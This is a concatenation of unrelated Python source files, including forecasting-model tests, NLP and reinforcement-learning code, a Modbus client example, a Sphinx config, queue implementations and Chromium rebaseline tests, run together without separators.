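# simply asserts False. The helper name here is hypothetical.
def _validate_input_sketch(l_f_validate_input, a_x, a_y, a_date):
    """Return True only if every registered validator accepts the input series."""
    for f_validate in l_f_validate_input:
        try:
            if f_validate(a_x, a_y, a_date) is False:
                return False
        except AssertionError:
            return False
    return True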
self.assertTrue(model1.validate_input(None, None, None)) self.assertTrue(model2.validate_input(None, None, None)) self.assertTrue(model3.validate_input(None, None, None)) self.assertFalse(model4.validate_input(None, None, None)) self.assertTrue((model1 + model2).validate_input(None, None, None)) self.assertFalse((model1 + model4).validate_input(None, None, None)) # Test 4: model_season_wday.validate_input(): # True if input date series includes all 7 weekdays a_date_incomplete = pd.date_range('2018-01-01', periods=5, freq='D') a_date_complete = pd.date_range('2018-01-01', periods=50, freq='D') self.assertFalse(model_season_wday.validate_input(None, None, None)) self.assertFalse( model_season_wday.validate_input( None, None, a_date_incomplete)) self.assertTrue( model_season_wday.validate_input( None, None, a_date_complete)) def test_model_l_cache_vars(self): a_date = pd.date_range('2020-01-01', '2020-06-01', freq='M') a_x = np.arange(0, a_date.size) # table: model - expected cache vars df_models = pd.DataFrame( columns=['model', 'l_cache_vars_expected'], data=[ [model_linear, []], [model_season_wday, 'a_weekday'], [model_season_month, 'a_month'], [model_season_fourier_yearly, 'a_t_fourier'], [model_linear + model_season_wday, 'a_weekday'], [model_season_wday * model_season_month, ['a_month', 'a_weekday']] ] ) for i, row in df_models.iterrows(): model = row.model l_cache_vars = model.l_cache_vars expected = forecast_models._as_list(row.l_cache_vars_expected) logger.info('Model: %s, l_cache: %s, expected: %s', model, l_cache_vars, expected) self.assertSetEqual(set(l_cache_vars), set(expected)) dict_cache_vars = model.init_cache(a_x, a_date) logger_info('dict cache vars: ', dict_cache_vars) def test_model_dict_f_cache(self): a_date = pd.date_range('2020-01-01', '2020-06-01', freq='M') a_x = np.arange(0, a_date.size) model_datelist = get_model_from_datelist( 'datelist', ['2018-01-01', '2018-01-02'], ['2018-12-25', '2019-12-25'] ) # table: model - expected cache functions df_models = pd.DataFrame( columns=['model', 'l_cache_vars_expected'], data=[ [model_linear, []], [model_calendar_uk, []], [model_calendar_us, []], [model_calendar_ita, []], [model_datelist, []], [model_season_wday_2, []] ] ) for i, row in df_models.iterrows(): model = row.model dict_f_cache = model.dict_f_cache expected = forecast_models._as_list(row.l_cache_vars_expected) logger.info('Model: %s, l_cache: %s, expected: %s', model, dict_f_cache, expected) # self.assertListEqual(dict_f_cache, expected) dict_cache_vars = model.init_cache(a_x, a_date) logger_info('dict cache vars: ', dict_cache_vars) ## todo: doesn't work def test_get_model_from_calendars(self): model_calendar = get_model_from_calendars(CalendarChristmasUK()) logger_info('model_calendar:', model_calendar) self.assertEqual(model_calendar.n_params, 1) logger_info('parameters:', model_calendar.n_params) model_calendar = get_model_from_calendars( [CalendarChristmasUK(), CalendarBankHolUK()], 'calendar2' ) logger_info('model_calendar:', model_calendar) self.assertEqual(model_calendar.n_params, 2) logger_info('parameters:', model_calendar.n_params) def test_get_model_from_date_list(self): model_datelist = get_model_from_datelist( 'datelist', ['2018-01-01', '2018-01-02'], ['2018-12-25', '2019-12-25'] ) logger_info('model_datelist:', model_datelist) logger_info('parameters:', model_datelist.n_params)# -*- coding: utf-8 -*- import sys sys.path.append("termspec/") import helpers as util import setup_data as sd import scores as sc import numpy as np from timer import Timer 
def conduct(verbose = True, window_size = 4, corpus = 'brown', score_fn = 'dice', language = 'english'): print('Conducting Experiment with Context Window...') print('Language: {}, Corpus: {}, Window Size: {}, Score Function: {}'.format(language, corpus, window_size, score_fn)) filename = 'experiment_context_window' # results_filename = 'results_' + filename + '_' + corpus + '_ws' + str(window_size) + '_' + score_fn + '.csv' # # Ugly Exception. No time to build it in properly... # binary = False # if score_fn is 'binary': # binary = True # score_fn = 'raw_count' data = sd.easy_setup_context_window( fqt = 10, window_size = window_size, score_fn = score_fn, filename = filename, corpus = corpus, deserialize = True, serialize = True ) words = data['words'] # Word-Word Co-occurrence Matrix WWC = data['WWC'] # # Continuation of the ugly exception # if binary: # WWC[np.nonzero(WWC)] = 1 # score_fn = binary if language is 'german': print(len(sd.word_pairs_german)) print(sd.word_pairs_german) word_pairs = util.remove_word_pairs_not_in_corpus(sd.word_pairs_german, words, language = 'german') else: word_pairs = util.remove_word_pairs_not_in_corpus(sd.word_pairs, words) # word_pairs = [('foo', 'bar'), ('bar', 'baz'), ('foo', 'plotz')] # print(len(word_pairs)) # print(word_pairs) scores = [ 'nzds', 'mdcs_cosi', 'mdcs_seuc', 'sca_mdcs_cosi', 'sca_mdcs_seuc', ] # For each wordpair, calculate ALL the scores! word_scores = {} for pair in word_pairs: for word in pair: word = util.normalize([word], language)[0] if not word in word_scores: with Timer() as t: word_scores[word] = {} word_scores[word]['nzds'] = sc.nzds(M = WWC, word = word, fns = words) word_scores[word]['mdcs_cosi'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'cosine') word_scores[word]['mdcs_seuc'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'seuclidean') word_scores[word]['sca_mdcs_cosi'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'cosine', scaled = True) word_scores[word]['sca_mdcs_seuc'] = sc.mdcs(WWC = WWC, word = word, fns = words, metric = 'seuclidean', scaled= True) # print('##### Calculated scores for %s in %4.1f' % (word, t.secs)) # print(word_scores[word]) ##################################################################### # RESULTS results = np.zeros( (len(word_pairs),len(scores)), dtype=bool) for i, pair in enumerate(word_pairs): word_a = util.normalize([pair[0]], language)[0] word_b = util.normalize([pair[1]], language)[0] for j, score in enumerate(scores): # By Convention, the More General Term comes first in word_pairs. # Checks whether the Score reflects that! results[i,j] = word_scores[word_a][score] > word_scores[word_b][score] total_hits = [np.sum(results, axis = 0)[i] for i, score in enumerate(scores)] percent_hits = [np.sum(results, axis = 0)[i] / len(word_pairs) for i, score in enumerate(scores)] results = np.vstack([results, total_hits, percent_hits]) # for j, score in enumerate(scores): # results[len(word_pairs)] = np.sum(results, axis = 1) labels = word_pairs + ['total hits','hit rate'] # Only give out detailed results in verbose mode. 
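# Standalone sketch of the hit convention computed above (hypothetical helper, not
# part of this script; it reuses the numpy import at the top): a pair counts as a
# "hit" for a score when the more general term -- listed first in word_pairs --
# receives the larger value, and the hit rate is the mean over all pairs.
def hit_rate_sketch(scores_general, scores_specific):
    hits = np.asarray(scores_general) > np.asarray(scores_specific)
    return int(hits.sum()), float(hits.mean())
# e.g. hit_rate_sketch([0.9, 0.8, 0.4], [0.5, 0.6, 0.5]) -> (2, 0.666...)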
if not verbose: results = results[-2:,:] labels = labels[-2:] util.printprettymatrix(M=results, rns = labels, cns = scores) return results, labels, scores # print(np.sum(results, axis = 0) / results.shape[0], np.sum(results, axis = 0), results.shape[0])# -*- coding: utf-8 -*- # !/bin/env python import json import os import gzip from exceptions import NonExistingData DATA_PATH = os.path.dirname(os.path.realpath(__file__)) FILES_PATH = os.path.abspath(os.path.join(DATA_PATH, "..", "files")) def exists_data(file_name): return os.path.exists(file_name) def read_from_file(file_name, format="json"): with open(file_name, "r") as f: if format == "json": return json.load(f) return '\n'.join(f.readlines()) def ensure_dir(file_name): d = os.path.dirname(file_name) if not os.path.exists(d): os.makedirs(d) def write_to_file(file_name, text): ensure_dir(file_name) with open(file_name, "w") as f: f.write(text) def __get_data_from_file__(func): def get_data(*args, **kwargs): self = args[0] file_name = self.get_file_name(*args[1:], **kwargs) if exists_data(file_name): data = read_from_file(file_name) return data return func(*args, **kwargs) return get_data def __write_data_to_file__(func): def write_data(*args, **kwargs): self = args[0] data = func(*args, **kwargs) file_name = self.get_file_name(*args[1:], **kwargs) write_to_file(file_name, json.dumps(data)) return data return write_data def iterate_supported_countries(): path = os.path.join(FILES_PATH, "cities") for country in os.listdir(path): if os.path.isdir(os.path.join(path, country)): yield country def iterate_main_cities(country): path = os.path.join(FILES_PATH, "cities", country, "main_cities.json.gz") if not os.path.exists(path): raise NonExistingData("Main cities not found for country=%s" % country) with gzip.open(path, "r") as f: for city in json.load(f): yield city def iterate_main_cities_name(country): for city in iterate_main_cities(country): yield city["city"] def iterate_cities(country): path = os.path.join(FILES_PATH, "cities", country, "cities.json.gz") if not os.path.exists(path): raise NonExistingData("Cities not found for country=%s" % country) with gzip.open(path, "r") as f: for city in json.load(f): yield city def iterate_cities_name(country): for city in iterate_cities(country): yield city["city"] def iterate_city_by_name(country, *city_names): for city in iterate_cities(country): if city["city"] in city_names: yield city zhangdongkun98/rl-lib1-10 import numpy as np from abc import ABC, abstractmethod from typing import List import torch from ..basic import Data as Experience from .tools import stack_data class RolloutBuffer(object): def __init__(self, device, batch_size=-1): self.batch_size, self.device = batch_size, device self._states, self._actions = [], [] self._rewards, self._dones = [], [] self._probs = [] self._memory: List[Experience] = [] self._prob_cache = None self.rollout_reward = False def push(self, experience: Experience): experience.update(prob=self._prob_cache) self._memory.append(experience) def push_prob(self, prob): self._prob_cache = prob def sample(self, gamma): if not self.rollout_reward: self.rollout_reward = True rewards = [] discounted_reward = 0 for e in reversed(self._memory): if e.done: discounted_reward = 0 discounted_reward = e.reward + gamma * discounted_reward rewards.insert(0, discounted_reward) for e, reward in zip(self._memory, rewards): e.update(reward=reward) self._memory = np.array(self._memory, dtype=Experience) batch_size = len(self) if self.batch_size <= 0 else self.batch_size indices = 
np.random.choice(len(self), batch_size, replace=False) batch = self._memory[indices] experiences: Experience = self._batch_stack(batch) return experiences.to(self.device) def __len__(self): return len(self._memory) def clear(self): del self._memory self._memory = [] self._prob_cache = None self.rollout_reward = False def _batch_stack(self, batch): """ To be override. """ result = stack_data(batch) result.update(reward=[*torch.tensor(result.reward, dtype=torch.float32).unsqueeze(1)]) result.update(done=[*torch.tensor(result.done, dtype=torch.float32).unsqueeze(1)]) result = result.cat(dim=0) result.reward.unsqueeze_(1) result.done.unsqueeze_(1) return result mcbor/advent_of_code_20161-10 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ 17b.py ~~~~~~ Advent of Code 2017 - Day 17: Spinlock Part Two The spinlock does not short-circuit. Instead, it gets more angry. At least, you assume that's what happened; it's spinning significantly faster than it was a moment ago. You have good news and bad news. The good news is that you have improved calculations for how to stop the spinlock. They indicate that you actually need to identify the value after 0 in the current state of the circular buffer. The bad news is that while you were determining this, the spinlock has just finished inserting its fifty millionth value (50000000). What is the value after 0 the moment 50000000 is inserted? :copyright: (c) 2017 by . :license: MIT, see LICENSE for more details. """ import sys def solve(steps): """Return value next to 0 after 50 million insertions. :steps: number of steps before every insertion :returns: value next to 0 >>> solve(3) 1222153 >>> solve(301) 33601318 """ c = 0 res = 0 for i in range(1, 50000000): c = (c + steps) % i + 1 if c == 1: res = i return res def main(argv): if len(argv) == 2: f = open(argv[1], 'r') else: sys.stderr.write('reading from stdin...\n') f = sys.stdin print(solve(int(f.read().strip()))) if __name__ == "__main__": sys.exit(main(sys.argv)) from typing import List, Optional from pydantic import BaseModel class MovieBase(BaseModel): title: str subtitle: Optional[str] = None price: float description: Optional[str] = None class MovieCreate(MovieBase): pass class Movie(MovieBase): id: int class Config: orm_mode = True class Movies(MovieBase): id: int movies: List[Movie] class Config: orm_mode = True class MovieUpdate(MovieBase): id: int zsheep5/pyModbusTCPexamples/min_read_bit.py #!/usr/bin/env python # -*- coding: utf-8 -*- import time # min_read_bit # minimal code for read 10 bits on IPv4 192.168.0.200 and print result on stdout from pyModbusTCP.client import ModbusClient c = ModbusClient(host="192.168.0.200", auto_open=True) while True: # read 10 bits at address 20480 bits = c.read_coils(20480, 10) print("bit ad #0 to 9: "+str(bits) if bits else "read error") # sleep 2s time.sleep(2) #!/usr/bin/env python3 # 主要功能是将aishell1的transcript文件中的说话人编号BAC009S0002W0122 转换成AISHELL2格式 IS0002W0122 # 因为aishell2采用结巴分词,移除标注的空格 new_transcripts = [] new_wav_scp = [] aishell_transcripts = open("../transcript/aishell_transcript_v0.8_remove_space.txt", encoding="utf-8") transcripts = aishell_transcripts.readlines() trans_txt = open("train/trans.txt", 'w', encoding="utf-8") wav_scp = open("train/wav.scp", 'w', encoding="utf-8") for transcript in transcripts: print(transcript) spkid = "I" + transcript[6:16] print(spkid) lable = transcript[16:len(transcript)] print(lable) new_transcripts.append(spkid + "\t" + lable) new_wav_scp.append(spkid + "\t" + "wav/"+spkid[1:6]+"/"+spkid+".wav\n") 
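# English gloss of the Chinese header above: this script converts AISHELL-1
# speaker/utterance IDs such as BAC009S0002W0122 into the AISHELL-2 style
# IS0002W0122; the transcript it reads already has the annotation spaces removed,
# because AISHELL-2 relies on jieba word segmentation.
# Minimal sketch of the per-line ID rewrite used in the loop above (hypothetical
# helper, assuming the same fixed-width slicing as that loop):
def convert_line_sketch(transcript_line):
    spkid = "I" + transcript_line[6:16]   # 'BAC009S0002W0122 ...' -> 'IS0002W0122'
    label = transcript_line[16:]          # remainder of the line is the utterance text
    return spkid, label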
print(new_transcripts) trans_txt.writelines(new_transcripts) wav_scp.writelines(new_wav_scp) aishell_transcripts.close() trans_txt.close() wav_scp.close() print("All Done!") dhill2522/ChE436-projectutils.py import matplotlib.pyplot as plt import pandas as pd def plot_data(data_file='data.csv', saved_image='data.png', show_plots=True): data = pd.read_csv(data_file, sep=',') plt.subplot(2, 1, 1) plt.plot(data['# time'], data['D'], label='D') # Plot this first on purpose plt.plot(data['# time'], data['P'], label='P') plt.plot(data['# time'], data['I'], label='I') plt.plot(data['# time'], data['Err'], label='Error') plt.legend() plt.subplot(2, 1, 2) plt.plot(data['# time'], data['box temp'], label='box temp') plt.plot(data['# time'], data['outside temp'], label='outside temp') plt.plot(data['# time'], data['SP'], label='setpoint') plt.legend() plt.savefig(saved_image) if show_plots: plt.show() def blink_rgb_leb(): import RPi.GPIO as GPIO GPIO.setmode(GPIO.BOARD) print('LED should start blinking now. Ctl-C to stop.') GPIO.setup(12, GPIO.OUT) try: while(True): GPIO.output(12, GPIO.HIGH) time.sleep(1) GPIO.output(12, GPIO.LOW) time.sleep(1) except KeyboardInterrupt: sys.exit() if __name__ == '__main__': plot_data(data_file='step_test.csv') train_procgen/netrand_policy.py import tensorflow as tf from baselines.common.policies import _normalize_clip_observation, PolicyWithValue from baselines.common.input import observation_placeholder, encode_observation from baselines.common.models import get_network_builder from .utils import reduce_std def build_policy(env, policy_network, value_network=None, normalize_observations=False, estimate_q=False, **policy_kwargs): if isinstance(policy_network, str): network_type = policy_network policy_network = get_network_builder(network_type)(**policy_kwargs) def policy_fn(nbatch=None, nsteps=None, sess=None, observ_placeholder=None, randomization=True): ob_space = env.observation_space extra_tensors = {} X = observ_placeholder if observ_placeholder is not None else observation_placeholder(ob_space, batch_size=None) encoded_x = encode_observation(ob_space, X) # Randomization if randomization: encoded_x = tf.layers.conv2d(encoded_x / 255., 3, 3, padding='same', kernel_initializer=tf.initializers.glorot_normal(), trainable=False, name='randcnn') * 255. 
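# Note on the conv2d above: this is the network-randomization step the module name
# "netrand_policy" refers to. Observations are scaled to [0, 1], passed through a
# frozen (trainable=False), Glorot-initialized 3x3 convolution with 3 output
# channels, then scaled back to [0, 255]. Because the layer is excluded from
# training, it only perturbs the inputs; the 'randcnn' variables are collected just
# below, presumably so the training loop can re-sample them between updates (that
# re-randomization itself is not shown in this file).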
randcnn_param = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope="ppo2_model/randcnn") extra_tensors['randcnn_param'] = randcnn_param with tf.variable_scope('pi', reuse=tf.AUTO_REUSE): policy_latent = policy_network(encoded_x) extra_tensors['latent_fts'] = policy_latent if isinstance(policy_latent, tuple): policy_latent, recurrent_tensors = policy_latent if recurrent_tensors is not None: # recurrent architecture, need a few more steps nenv = nbatch // nsteps assert nenv > 0, 'Bad input for recurrent policy: batch size {} smaller than nsteps {}'.format(nbatch, nsteps) policy_latent, recurrent_tensors = policy_network(encoded_x, nenv) extra_tensors.update(recurrent_tensors) _v_net = value_network if _v_net is None or _v_net == 'shared': vf_latent = policy_latent else: if _v_net == 'copy': _v_net = policy_network else: assert callable(_v_net) with tf.variable_scope('vf', reuse=tf.AUTO_REUSE): # TODO recurrent architectures are not supported with value_network=copy yet vf_latent = _v_net(encoded_x) policy = PolicyWithValue( env=env, observations=X, latent=policy_latent, vf_latent=vf_latent, sess=sess, estimate_q=estimate_q, **extra_tensors ) return policy return policy_fn # coding=utf-8 import os import sys # import package (from setup) to get infos # add root dir to python path (for tools lke nbsphinx) BASE_DIR = os.path.join(os.path.dirname(__file__), "..") os.environ["PYTHONPATH"] = BASE_DIR sys.path.insert(0, BASE_DIR) # needed for import setup from setup import pkg # noqa: E402 project = pkg.__title__ description = pkg.__doc__ version = pkg.__version__ author = pkg.__author__ email = pkg.__email__ copyright = pkg.__copyright__ release = version html_search_language = "en" html_show_copyright = False todo_include_todos = False add_module_names = False show_authors = True html_show_sourcelink = False html_show_sphinx = True docs_path = "." 
html_theme_options = {} html_theme = "sphinx_rtd_theme" master_doc = "index" source_encoding = "utf-8" source_suffix = { ".rst": "restructuredtext", ".md": "markdown", } pygments_style = "sphinx" html_logo = os.path.join(docs_path, "_static/logo.svg") html_favicon = os.path.join(docs_path, "_static/favicon.ico") templates_path = [os.path.join(docs_path, "_templates")] html_static_path = [os.path.join(docs_path, "_static")] exclude_dirs = [] # do not include in autodoc nitpicky = False html_use_index = True add_function_parentheses = True extensions = [ "sphinx.ext.autodoc", "sphinx.ext.todo", "sphinx.ext.mathjax", "sphinx.ext.viewcode", "sphinx.ext.graphviz", "sphinx.ext.napoleon", "nbsphinx", "myst_parser", # markdown ] # Napoleon settings napoleon_google_docstring = True napoleon_numpy_docstring = True napoleon_include_init_with_doc = False napoleon_include_private_with_doc = False napoleon_include_special_with_doc = False napoleon_use_admonition_for_examples = False napoleon_use_admonition_for_notes = False napoleon_use_admonition_for_references = False napoleon_use_ivar = False napoleon_use_param = True napoleon_use_rtype = True napoleon_use_keyword = True # Mathjax settings mathjax_path = "https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.7/MathJax.js" mathjax_config = { "extensions": ["tex2jax.js"], "jax": ["input/TeX", "output/CommonHTML"], "tex2jax": { "inlineMath": [["$", "$"], ["\\(", "\\)"]], "displayMath": [["$$", "$$"], ["\\[", "\\]"]], "processEscapes": True, }, "HTML-CSS": {"availableFonts": ["TeX"]}, "menuSettings": {"zoom": "Double-Click", "mpContext": True, "mpMouse": True}, "config": [], "showProcessingMessages": False, "messageStyle": "none", "showMathMenu": False, "displayAlign": "left", } # graphviz graphviz_output_format = "svg" # svg | png # -*- coding: utf-8 -*- # # This file is part of the SKA PST LMC project # # Distributed under the terms of the BSD 3-clause new license. # See LICENSE for more info. 
"""This module contains tests for the RECV component managers class.""" import logging from typing import Callable from unittest.mock import MagicMock import pytest from ska_tango_base.control_model import CommunicationStatus, SimulationMode from ska_pst_lmc.smrb.smrb_component_manager import PstSmrbComponentManager from ska_pst_lmc.smrb.smrb_model import SharedMemoryRingBufferData from ska_pst_lmc.smrb.smrb_process_api import PstSmrbProcessApi, PstSmrbProcessApiSimulator @pytest.fixture def component_manager( simulation_mode: SimulationMode, logger: logging.Logger, api: PstSmrbProcessApi, communication_state_callback: Callable[[CommunicationStatus], None], component_state_callback: Callable, ) -> PstSmrbComponentManager: """Create instance of a component manager.""" return PstSmrbComponentManager( simulation_mode=simulation_mode, logger=logger, communication_state_callback=communication_state_callback, component_state_callback=component_state_callback, api=api, ) @pytest.fixture def api( simulation_mode: SimulationMode, logger: logging.Logger, component_state_callback: Callable, ) -> PstSmrbProcessApi: """Create an API instance.""" if simulation_mode == SimulationMode.TRUE: return PstSmrbProcessApiSimulator( logger=logger, component_state_callback=component_state_callback, ) else: raise ValueError("Expected simulation mode to be true") @pytest.fixture def monitor_data() -> SharedMemoryRingBufferData: """Create an an instance of ReceiveData for monitor data.""" from ska_pst_lmc.smrb.smrb_simulator import PstSmrbSimulator simulator = PstSmrbSimulator() simulator.scan(args={}) return simulator.get_data() def test_start_communicating_calls_connect_on_api( component_manager: PstSmrbComponentManager, api: PstSmrbProcessApi, ) -> None: """Assert start/stop communicating calls API.""" api = MagicMock(wraps=api) component_manager._api = api component_manager.start_communicating() api.connect.assert_called_once() api.disconnect.assert_not_called() component_manager.stop_communicating() api.disconnect.assert_called_once() @pytest.mark.parametrize( "property", [ ("ring_buffer_utilisation"), ("ring_buffer_size"), ("number_subbands"), ("subband_ring_buffer_utilisations"), ("subband_ring_buffer_sizes"), ], ) def test_properties_come_from_api_monitor_data( component_manager: PstSmrbComponentManager, api: PstSmrbProcessApi, monitor_data: SharedMemoryRingBufferData, property: str, ) -> None: """Test properties are coming from API monitor data.""" api = MagicMock() type(api).monitor_data = monitor_data component_manager._api = api actual = getattr(component_manager, property) expected = getattr(monitor_data, property) assert actual == expected efitr/Core-Data-Structures #!python from linkedlist import LinkedList, Node # Implement LinkedQueue below, then change the assignment at the bottom # to use this Queue implementation to verify it passes all tests class LinkedQueue(object): def __init__(self, iterable=None): """Initialize this queue and enqueue the given items, if any.""" # Initialize a new linked list to store the items self.linked_list = LinkedList() if iterable is not None: for item in iterable: self.enqueue(item) def __repr__(self): """Return a string representation of this queue.""" return 'Queue({} items, front={})'.format(self.length(), self.front()) def is_empty(self): """Return True if this queue is empty, or False otherwise.""" if self.linked_list.size == 0: return True return False def length(self): """Return the number of items in this queue.""" return self.linked_list.length() def 
enqueue(self, item): """Insert the given item at the back of this queue. Running time: O(1) – Why? You are appending at the end of the LinkList, """ self.linked_list.append(item) def front(self): """Return the item at the front of this queue without removing it, or None if this queue is empty.""" if self.linked_list.is_empty(): return None return self.linked_list.head.data def dequeue(self): """Remove and return the item at the front of this queue, or raise ValueError if this queue is empty. Running time: O(???) – Why? [TODO]""" if self.is_empty(): raise ValueError("No items in Queue to Dequeue") item = self.linked_list.head.data self.linked_list.delete(item) return item # Implement ArrayQueue below, then change the assignment at the bottom # to use this Queue implementation to verify it passes all tests class ArrayQueue(object): def __init__(self, iterable=None): """Initialize this queue and enqueue the given items, if any.""" # Initialize a new list (dynamic array) to store the items self.python3_dynamic_array = list() if iterable is not None: for item in iterable: self.enqueue(item) def __repr__(self): """Return a string representation of this queue.""" return 'Queue({} items, front={})'.format(self.length(), self.front()) def is_empty(self): """Return True if this queue is empty, or False otherwise.""" if len(self.python3_dynamic_array) == 0: return True return False def length(self): """Return the number of items in this queue.""" return len(self.python3_dynamic_array) def enqueue(self, item): """Insert the given item at the back of this queue. Running time: O(1) – Why? The python3 dynamic array when placing something at the end doesnt need to move any index it just makes the space in memory have one more place next to it.""" return self.python3_dynamic_array.append(item) def front(self): """Return the item at the front of this queue without removing it, or None if this queue is empty.""" if self.is_empty(): return None return self.python3_dynamic_array[0] def dequeue(self): """Remove and return the item at the front of this queue, or raise ValueError if this queue is empty. Running time: O(n) – Why? There is the need to [TODO]""" if self.is_empty() is True: raise ValueError('There is not value to dequeue') return self.python3_dynamic_array.pop(0) # Implement LinkedQueue and ArrayQueue above, then change the assignment below # to use each of your Queue implementations to verify they each pass all tests # Queue = LinkedQueue Queue = ArrayQueue zealoussnow/chromium # Copyright 2017 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. 
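# Side note on ArrayQueue.dequeue() above, whose docstring leaves the O(n) reasoning
# as a TODO: list.pop(0) is linear because every remaining element must shift one
# slot to the left; the standard-library deque avoids this with O(1) operations at
# both ends. Quick illustration (not part of either surrounding file):
from collections import deque
_q = deque()
_q.append('a')          # enqueue at the back, O(1)
_q.append('b')
_front = _q.popleft()   # dequeue from the front, O(1) -> 'a'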
import optparse import six from blinkpy.common.system.executive_mock import MockExecutive from blinkpy.common.system.output_capture import OutputCapture from blinkpy.tool.commands.rebaseline_test import RebaselineTest from blinkpy.tool.commands.rebaseline_unittest import BaseTestCase class TestRebaselineTest(BaseTestCase): command_constructor = RebaselineTest @staticmethod def options(**kwargs): return optparse.Values( dict( { 'builder': 'MOCK Mac10.11', 'port_name': None, 'test': 'userscripts/another-test.html', 'suffixes': 'txt', 'results_directory': None, 'build_number': None, 'step_name': None, 'flag_specific': None, }, **kwargs)) def test_rebaseline_test_internal_with_port_that_lacks_buildbot(self): self.tool.executive = MockExecutive() port = self.tool.port_factory.get('test-win-win7') baseline_relative_path = 'platform/test-win-win10/failures/expected/image-expected.txt' baseline_local_absolute_path = port.host.filesystem.join( port.web_tests_dir(), baseline_relative_path) self._write(baseline_local_absolute_path, 'original win10 result') actual_result_url = ( 'https://test-results.appspot.com/data/layout_results/MOCK_Win10/' + 'results/layout-test-results/failures/expected/image-actual.txt') self.tool.web.urls[actual_result_url] = b'new win10 result' oc = OutputCapture() try: options = optparse.Values({ 'optimize': True, 'builder': 'MOCK Win10', 'port_name': None, 'suffixes': 'txt', 'verbose': True, 'test': 'failures/expected/image.html', 'results_directory': None, 'build_number': None, 'step_name': None, 'flag_specific': None, }) oc.capture_output() self.command.execute(options, [], self.tool) finally: out, _, _ = oc.restore_output() six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) self.assertMultiLineEqual( self._read(baseline_local_absolute_path), 'new win10 result') self.assertFalse( self.tool.filesystem.exists( self.tool.filesystem.join( port.web_tests_dir(), 'platform/test-win-win7/failures/expected/image-expected.txt' ))) # We should not change TestExpectations for unexpected failures. 
self.assertMultiLineEqual(out, '') def test_baseline_directory(self): self.assertMultiLineEqual( self.command.baseline_directory('MOCK Mac10.11'), '/test.checkout/wtests/platform/test-mac-mac10.11') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Mac10.10'), '/test.checkout/wtests/platform/test-mac-mac10.10') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Trusty'), '/test.checkout/wtests/platform/test-linux-trusty') self.assertMultiLineEqual( self.command.baseline_directory('MOCK Precise'), '/test.checkout/wtests/platform/test-linux-precise') def test_rebaseline_updates_expectations_file_noop(self): # pylint: disable=protected-access self._zero_out_test_expectations() self._write(self.test_expectations_path, ( 'Bug(B) [ Mac Linux Win7 Debug ] fast/dom/Window/window-postmessage-clone-really-deep-array.html [ Pass ]\n' 'Bug(A) [ Debug ] : fast/css/large-list-of-rules-crash.html [ Failure ]\n' )) self._write( 'fast/dom/Window/window-postmessage-clone-really-deep-array.html', 'Dummy test contents') self._write('fast/css/large-list-of-rules-crash.html', 'Dummy test contents') self._write('userscripts/another-test.html', 'Dummy test contents') self.command._rebaseline_test_and_update_expectations( self.options(suffixes='png,wav,txt')) six.assertCountEqual(self, self.tool.web.urls_fetched, [ self.WEB_PREFIX + '/userscripts/another-test-actual.png', self.WEB_PREFIX + '/userscripts/another-test-actual.wav', self.WEB_PREFIX + '/userscripts/another-test-actual.txt' ]) new_expectations = self._read(self.test_expectations_path) self.assertMultiLineEqual(new_expectations, ( 'Bug(B) [ Mac Linux Win7 Debug ] fast/dom/Window/window-postmessage-clone-really-deep-array.html [ Pass ]\n' 'Bug(A) [ Debug ] : fast/css/large-list-of-rules-crash.html [ Failure ]\n' )) def test_rebaseline_test(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.tool.web.urls[actual_result_url] = b'new result' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), 'new result') def test_rebaseline_test_empty_result(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.tool.web.urls[actual_result_url] = b'' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), '') def test_rebaseline_test_non_existence_result(self): # pylint: disable=protected-access actual_result_url = self.WEB_PREFIX + '/userscripts/another-test-actual.txt' self.command._rebaseline_test('test-linux-trusty', 'userscripts/another-test.html', 'txt', self.WEB_PREFIX) six.assertCountEqual(self, self.tool.web.urls_fetched, [actual_result_url]) port = self.tool.port_factory.get('test-linux-trusty') self.assertMultiLineEqual( self._read( port.host.filesystem.join( port.baseline_version_dir(), 'userscripts/another-test-expected.txt')), '') def 
test_rebaseline_test_with_results_directory(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write( self.test_expectations_path, ('Bug(x) [ Mac ] userscripts/another-test.html [ Failure ]\n' 'bug(z) [ Linux ] userscripts/another-test.html [ Failure ]\n')) self.command._rebaseline_test_and_update_expectations( self.options(results_directory='/tmp')) six.assertCountEqual( self, self.tool.web.urls_fetched, ['file:///tmp/userscripts/another-test-actual.txt']) def test_rebaseline_reftest(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write('userscripts/another-test-expected.html', 'generic result') OutputCapture().assert_outputs( self, self.command._rebaseline_test_and_update_expectations, args=[self.options(suffixes='png')], expected_logs= 'Cannot rebaseline image result for reftest: userscripts/another-test.html\n' ) self.assertDictEqual(self.command.expectation_line_changes.to_dict(), {'remove-lines': []}) def test_rebaseline_reftest_with_text(self): # pylint: disable=protected-access self._write('userscripts/another-test.html', 'test data') self._write('userscripts/another-test-expected.html', 'generic result') self._write('userscripts/another-test-expected.txt', 'text') OutputCapture().assert_outputs( self, self.command._rebaseline_test_and_update_expectations, args=[self.options(suffixes='png,txt')], expected_logs= 'Cannot rebaseline image result for reftest: userscripts/another-test.html\n' ) six.assertCountEqual( self, self.tool.web.urls_fetched, [self.WEB_PREFIX + '/userscripts/another-test-actual.txt']) 